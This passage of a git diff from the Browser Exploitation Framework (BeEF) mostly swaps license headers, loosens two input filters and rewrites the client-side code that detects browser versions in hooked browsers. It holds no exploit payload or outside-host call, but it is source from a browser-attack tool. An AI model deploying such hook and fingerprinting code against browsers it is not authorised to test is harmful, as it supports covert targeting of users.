WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Filters diff --git a/core/filters/base.rb b/core/filters/base.rb index 14492577b..39b2a5044 100644 --- a/core/filters/base.rb +++ b/core/filters/base.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Filters diff --git a/core/filters/browser.rb b/core/filters/browser.rb index 7dbcfdfc6..1ecdd0023 100644 --- a/core/filters/browser.rb +++ b/core/filters/browser.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Filters @@ -32,7 +22,7 @@ module Filters def self.is_valid_browsertype?(str) return false if not is_non_empty_string?(str) return false if str.length < 10 - return false if str.length > 50 + return false if str.length > 250 return false if has_non_printable_char?(str) true end @@ -133,9 +123,9 @@ module Filters return true if not is_non_empty_string?(str) return false if str.length > 1000 if RUBY_VERSION >= "1.9" && str.encoding === Encoding.find('UTF-8') - return (str =~ /[^\w\d\s()-.,;_!\302\256]/u).nil? + return (str =~ /[^\w\d\s()-.,';_!\302\256]/u).nil? else - return (str =~ /[^\w\d\s()-.,;_!\302\256]/n).nil? + return (str =~ /[^\w\d\s()-.,';_!\302\256]/n).nil? end end diff --git a/core/filters/command.rb b/core/filters/command.rb index dcb779a8b..a80abf96c 100644 --- a/core/filters/command.rb +++ b/core/filters/command.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Filters diff --git a/core/filters/http.rb b/core/filters/http.rb index 74e316d03..6a79287e3 100644 --- a/core/filters/http.rb +++ b/core/filters/http.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Filters diff --git a/core/filters/page.rb b/core/filters/page.rb index b75852f18..5d63d423f 100644 --- a/core/filters/page.rb +++ b/core/filters/page.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Filters diff --git a/core/hbmanager.rb b/core/hbmanager.rb index cd5eb8bc0..3ea1747ce 100644 --- a/core/hbmanager.rb +++ b/core/hbmanager.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module HBManager diff --git a/core/loader.rb b/core/loader.rb index 3ba04c62f..502a664e5 100644 --- a/core/loader.rb +++ b/core/loader.rb @@ -1,17 +1,8 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. # @note Include here all the gems we are using require 'rubygems' diff --git a/core/main/client/are.js b/core/main/client/are.js index 4cdcff84b..fce1728cc 100644 --- a/core/main/client/are.js +++ b/core/main/client/are.js @@ -1,25 +1,47 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.are = { init:function(){ var Jools = require('jools'); this.ruleEngine = new Jools(); }, - rules:[], + send:function(module){ + // there will probably be some other stuff here before things are finished + this.commands.push(module); + }, + execute:function(inputs){ + this.rulesEngine.execute(input); + }, + cache_modules:function(modules){}, + rules:[ + { + 'name':"exec_no_input", + 'condition':function(command,browser){ + //need to figure out how to handle the inputs + return (!command['inputs'] || command['inputs'].length == 0) + }, + 'consequence':function(command,browser){} + }, + { + 'name':"module_has_sibling", + 'condition':function(command,commands){ + return false; + }, + 'consequence':function(command,commands){} + }, + { + 'name':"module_depends_on_module", + 'condition':function(command,commands){ + return false; + }, + 'consequence':function(command,commands){} + } + ], commands:[], results:[] }; -beef.regCmp("beef.are"); \ No newline at end of file +beef.regCmp("beef.are"); diff --git a/core/main/client/beef.js b/core/main/client/beef.js index b580c936c..f2f64f928 100644 --- a/core/main/client/beef.js +++ b/core/main/client/beef.js @@ -1,27 +1,16 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /*! * BeEF JS Library <%= @beef_version %> - * http://beef.googlecode.com/ + * Register the BeEF JS on the window object. */ $j = jQuery.noConflict(); -//<%= @beef_hook_session_name %>='<%= @beef_hook_session_id %>'; - if(typeof beef === 'undefined' && typeof window.beef === 'undefined') { var BeefJS = { @@ -42,7 +31,21 @@ if(typeof beef === 'undefined' && typeof window.beef === 'undefined') { // An array containing all the BeEF JS components. components: new Array(), - + + /** + * Adds a function to display debug messages (wraps console.log()) + * @param: {string} the debug string to return + */ + debug: function(msg) { + if (!<%= @client_debug %>) return; + if (typeof console == "object" && typeof console.log == "function") { + console.log(msg); + } else { + // TODO: maybe add a callback to BeEF server for debugging purposes + //window.alert(msg); + } + }, + /** * Adds a function to execute. * @param: {Function} the function to execute. diff --git a/core/main/client/browser.js b/core/main/client/browser.js index 42bfcaca0..b66086ac6 100644 --- a/core/main/client/browser.js +++ b/core/main/client/browser.js @@ -1,769 +1,1677 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /** * @literal object: beef.browser * * Basic browser functions. */ beef.browser = { - - /** - * Returns the user agent that the browser is claiming to be. - * @example: beef.browser.getBrowserReportedName() - */ - getBrowserReportedName: function() { - return navigator.userAgent; - }, - - /** - * Returns true if IE6. - * @example: beef.browser.isIE6() - */ - isIE6: function() { - return !window.XMLHttpRequest && !window.globalStorage; - }, - - /** - * Returns true if IE7. - * @example: beef.browser.isIE7() - */ - isIE7: function() { - return !!window.XMLHttpRequest && !window.chrome && !window.opera && !window.getComputedStyle && !window.globalStorage && !document.documentMode; - }, - - /** - * Returns true if IE8. - * @example: beef.browser.isIE8() - */ - isIE8: function() { - return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !window.performance; - }, - - /** - * Returns true if IE9. - * @example: beef.browser.isIE9() - */ - isIE9: function() { - return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance; - }, - - /** - * Returns true if IE. - * @example: beef.browser.isIE() - */ - isIE: function() { - return this.isIE6() || this.isIE7() || this.isIE8() || this.isIE9(); - }, - - /** - * Returns true if FF2. - * @example: beef.browser.isFF2() - */ - isFF2: function() { - return !!window.globalStorage && !window.postMessage; - }, - - /** - * Returns true if FF3. - * @example: beef.browser.isFF3() - */ - isFF3: function() { - return !!window.globalStorage && !!window.postMessage && !JSON.parse; - }, - - /** - * Returns true if FF3.5. - * @example: beef.browser.isFF3_5() - */ - isFF3_5: function() { - return !!window.globalStorage && !!JSON.parse && !window.FileReader; - }, - - /** - * Returns true if FF3.6. - * @example: beef.browser.isFF3_6() - */ - isFF3_6: function() { - return !!window.globalStorage && !!window.FileReader && !window.multitouchData && !window.history.replaceState; - }, + + /** + * Returns the user agent that the browser is claiming to be. + * @example: beef.browser.getBrowserReportedName() + */ + getBrowserReportedName:function () { + return navigator.userAgent; + }, + + /** + * Returns true if Avant Browser. + * @example: beef.browser.isA() + */ + isA:function () { + return window.navigator.userAgent.match(/Avant TriCore/) != null; + }, + + /** + * Returns true if Iceweasel. + * @example: beef.browser.isI() + */ + isI:function () { + return window.navigator.userAgent.match(/Iceweasel\/\d+\.\d/) != null; + }, + + /** + * Returns true if IE6. + * @example: beef.browser.isIE6() + */ + isIE6:function () { + return !window.XMLHttpRequest && !window.globalStorage; + }, + + /** + * Returns true if IE7. + * @example: beef.browser.isIE7() + */ + isIE7:function () { + return !!window.XMLHttpRequest && !window.chrome && !window.opera && !window.getComputedStyle && !window.globalStorage && !document.documentMode; + }, + + /** + * Returns true if IE8. + * @example: beef.browser.isIE8() + */ + isIE8:function () { + return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !window.performance; + }, + + /** + * Returns true if IE9. + * @example: beef.browser.isIE9() + */ + isIE9:function () { + return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance && typeof navigator.msMaxTouchPoints === "undefined"; + }, + + /** + * + * Returns true if IE10. + * @example: beef.browser.isIE10() + */ + isIE10:function () { + return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance && typeof navigator.msMaxTouchPoints !== "undefined"; + }, + + /** + * Returns true if IE. + * @example: beef.browser.isIE() + */ + isIE:function () { + return this.isIE6() || this.isIE7() || this.isIE8() || this.isIE9() || this.isIE10(); + }, + + /** + * Returns true if FF2. + * @example: beef.browser.isFF2() + */ + isFF2:function () { + return !!window.globalStorage && !window.postMessage; + }, + + /** + * Returns true if FF3. + * @example: beef.browser.isFF3() + */ + isFF3:function () { + return !!window.globalStorage && !!window.postMessage && !JSON.parse; + }, + + /** + * Returns true if FF3.5. + * @example: beef.browser.isFF3_5() + */ + isFF3_5:function () { + return !!window.globalStorage && !!JSON.parse && !window.FileReader; + }, + + /** + * Returns true if FF3.6. + * @example: beef.browser.isFF3_6() + */ + isFF3_6:function () { + return !!window.globalStorage && !!window.FileReader && !window.multitouchData && !window.history.replaceState; + }, + + /** + * Returns true if FF4. + * @example: beef.browser.isFF4() + */ + isFF4:function () { + return !!window.globalStorage && !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/4\./) != null; + }, + + /** + * Returns true if FF5. + * @example: beef.browser.isFF5() + */ + isFF5:function () { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/5\./) != null; + }, + + /** + * Returns true if FF6. + * @example: beef.browser.isFF6() + */ + isFF6:function () { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/6\./) != null; + }, + + /** + * Returns true if FF7. + * @example: beef.browser.isFF7() + */ + isFF7:function () { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/7\./) != null; + }, + + /** + * Returns true if FF8. + * @example: beef.browser.isFF8() + */ + isFF8:function () { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/8\./) != null; + }, + + /** + * Returns true if FF9. + * @example: beef.browser.isFF9() + */ + isFF9:function () { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/9\./) != null; + }, + + /** + * Returns true if FF10. + * @example: beef.browser.isFF10() + */ + isFF10:function () { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/10\./) != null; + }, + + /** + * Returns true if FF11. + * @example: beef.browser.isFF11() + */ + isFF11:function () { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/11\./) != null; + }, + + /** + * Returns true if FF12 + * @example: beef.browser.isFF12() + */ + isFF12:function () { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/12\./) != null; + }, + + /** + * Returns true if FF13 + * @example: beef.browser.isFF13() + */ + isFF13:function () { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/13\./) != null; + }, + + /** + * Returns true if FF14 + * @example: beef.browser.isFF14() + */ + isFF14:function () { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/14\./) != null; + }, + + /** + * Returns true if FF15 + * @example: beef.browser.isFF15() + */ + isFF15:function () { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/15\./) != null; + }, + + /** + * Returns true if FF16 + * @example: beef.browser.isFF16() + */ + isFF16:function () { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/16\./) != null; + }, + + /** + * Returns true if FF17 + * @example: beef.browser.isFF17() + */ + isFF17:function () { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/17\./) != null; + }, + + /** + * Returns true if FF18 + * @example: beef.browser.isFF18() + */ + isFF18:function () { + return !!window.devicePixelRatio && !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/18\./) != null; + }, + + /** + * Returns true if FF19 + * @example: beef.browser.isFF19() + */ + isFF19:function () { + return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/19\./) != null; + }, /** - * Returns true if FF4. - * @example: beef.browser.isFF4() + * Returns true if FF20 + * @example: beef.browser.isFF20() */ - isFF4: function() { - return !!window.globalStorage && !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/4\./) != null; - }, - - /** - * Returns true if FF5. - * @example: beef.browser.isFF5() - */ - isFF5: function() { - return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/5\./) != null; + isFF20:function () { + return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/20\./) != null; }, - /** - * Returns true if FF6. - * @example: beef.browser.isFF6() - */ - isFF6: function() { - return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/6\./) != null; - }, + /** + * Returns true if FF21 + * @example: beef.browser.isFF21() + */ + isFF21:function () { + return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/21\./) != null; + }, - /** - * Returns true if FF7. - * @example: beef.browser.isFF7() - */ - isFF7: function() { - return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/7\./) != null; - }, + /** + * Returns true if FF22 + * @example: beef.browser.isFF22() + */ + isFF22:function () { + return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/22\./) != null; + }, - /** - * Returns true if FF8. - * @example: beef.browser.isFF8() - */ - isFF8: function() { - return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/8\./) != null; - }, + /** + * Returns true if FF23 + * @example: beef.browser.isFF23() + */ + isFF23:function () { + return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/23\./) != null; + }, - /** - * Returns true if FF9. - * @example: beef.browser.isFF9() - */ - isFF9: function() { - return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/9\./) != null; - }, + /** + * Returns true if FF24 + * @example: beef.browser.isFF24() + */ + isFF24:function () { + return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/24\./) != null; + }, - /** - * Returns true if FF10. - * @example: beef.browser.isFF10() - */ - isFF10: function() { - return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/10\./) != null; - }, + /** + * Returns true if FF25 + * @example: beef.browser.isFF25() + */ + isFF25:function () { + return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/25\./) != null; + }, - /** - * Returns true if FF11. - * @example: beef.browser.isFF11() - */ - isFF11: function() { - return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/11\./) != null; - }, + /** + * Returns true if FF. + * @example: beef.browser.isFF() + */ + isFF:function () { + return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25(); + }, - /** - * Returns true if FF12 - * @example: beef.browser.isFF12() - */ - isFF12: function() { - return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/12\./) != null; - }, + /** + * Returns true if Safari 4.xx + * @example: beef.browser.isS4() + */ + isS4:function () { + return (window.navigator.userAgent.match(/ Version\/4\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window)); + }, - /** - * Returns true if FF13 - * @example: beef.browser.isFF13() - */ - isFF13: function() { - return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/13\./) != null; - }, - - /** - * Returns true if FF14 - * @example: beef.browser.isFF14() - */ - isFF14: function() { - return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/14\./) != null; - }, - - /** - * Returns true if FF. - * @example: beef.browser.isFF() - */ - isFF: function() { - return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14(); - }, - - /** - * Returns true if Safari 4.xx - * @example: beef.browser.isS4() - */ - isS4: function() { - return (window.navigator.userAgent.match(/ Version\/4\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome); - }, - - /** - * Returns true if Safari 5.xx - * @example: beef.browser.isS5() - */ - isS5: function() { - return (window.navigator.userAgent.match(/ Version\/5\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome); - }, + /** + * Returns true if Safari 5.xx + * @example: beef.browser.isS5() + */ + isS5:function () { + return (window.navigator.userAgent.match(/ Version\/5\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window)); + }, /** * Returns true if Safari 6.xx * @example: beef.browser.isS6() */ - isS6: function() { - return (window.navigator.userAgent.match(/ Version\/6\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome); + isS6:function () { + return (window.navigator.userAgent.match(/ Version\/6\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window)); }, - - /** - * Returns true if Safari. - * @example: beef.browser.isS() - */ - isS: function() { - return this.isS4() || this.isS5() || this.isS6() || (!window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome); - }, - /** - * Returns true if Chrome 5. - * @example: beef.browser.isC5() - */ - isC5: function() { - return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==5)?true:false); - }, - - /** - * Returns true if Chrome 6. - * @example: beef.browser.isC6() - */ - isC6: function() { - return (!!window.chrome && !!window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==6)?true:false); - }, + /** + * Returns true if Safari. + * @example: beef.browser.isS() + */ + isS:function () { + return this.isS4() || this.isS5() || this.isS6(); + }, - /** - * Returns true if Chrome 7. - * @example: beef.browser.isC7() - */ - isC7: function() { - return (!!window.chrome && !!window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==7)?true:false); - }, + /** + * Returns true if Chrome 5. + * @example: beef.browser.isC5() + */ + isC5:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 5) ? true : false); + }, - /** - * Returns true if Chrome 8. - * @example: beef.browser.isC8() - */ - isC8: function() { - return (!!window.chrome && !!window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==8)?true:false); - }, - - /** - * Returns true if Chrome 9. - * @example: beef.browser.isC9() - */ - isC9: function() { - return (!!window.chrome && !!window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==9)?true:false); - }, - - /** - * Returns true if Chrome 10. - * @example: beef.browser.isC10() - */ - isC10: function() { - return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==10)?true:false); - }, + /** + * Returns true if Chrome 6. + * @example: beef.browser.isC6() + */ + isC6:function () { + return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 6) ? true : false); + }, - /** - * Returns true if Chrome 11. - * @example: beef.browser.isC11() - */ - isC11: function() { - return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==11)?true:false); - }, - - /** - * Returns true if Chrome 12. - * @example: beef.browser.isC12() - */ - isC12: function() { - return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==12)?true:false); - }, + /** + * Returns true if Chrome 7. + * @example: beef.browser.isC7() + */ + isC7:function () { + return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 7) ? true : false); + }, - /** - * Returns true if Chrome 13. - * @example: beef.browser.isC13() - */ - isC13: function() { - return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==13)?true:false); - }, + /** + * Returns true if Chrome 8. + * @example: beef.browser.isC8() + */ + isC8:function () { + return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 8) ? true : false); + }, - /** - * Returns true if Chrome 14. - * @example: beef.browser.isC14() - */ - isC14: function() { - return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==14)?true:false); - }, + /** + * Returns true if Chrome 9. + * @example: beef.browser.isC9() + */ + isC9:function () { + return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 9) ? true : false); + }, - /** - * Returns true if Chrome 15. - * @example: beef.browser.isC15() - */ - isC15: function() { - return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==15)?true:false); - }, + /** + * Returns true if Chrome 10. + * @example: beef.browser.isC10() + */ + isC10:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 10) ? true : false); + }, - /** - * Returns true if Chrome 16. - * @example: beef.browser.isC16() - */ - isC16: function() { - return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==16)?true:false); - }, + /** + * Returns true if Chrome 11. + * @example: beef.browser.isC11() + */ + isC11:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 11) ? true : false); + }, + + /** + * Returns true if Chrome 12. + * @example: beef.browser.isC12() + */ + isC12:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 12) ? true : false); + }, + + /** + * Returns true if Chrome 13. + * @example: beef.browser.isC13() + */ + isC13:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 13) ? true : false); + }, + + /** + * Returns true if Chrome 14. + * @example: beef.browser.isC14() + */ + isC14:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 14) ? true : false); + }, + + /** + * Returns true if Chrome 15. + * @example: 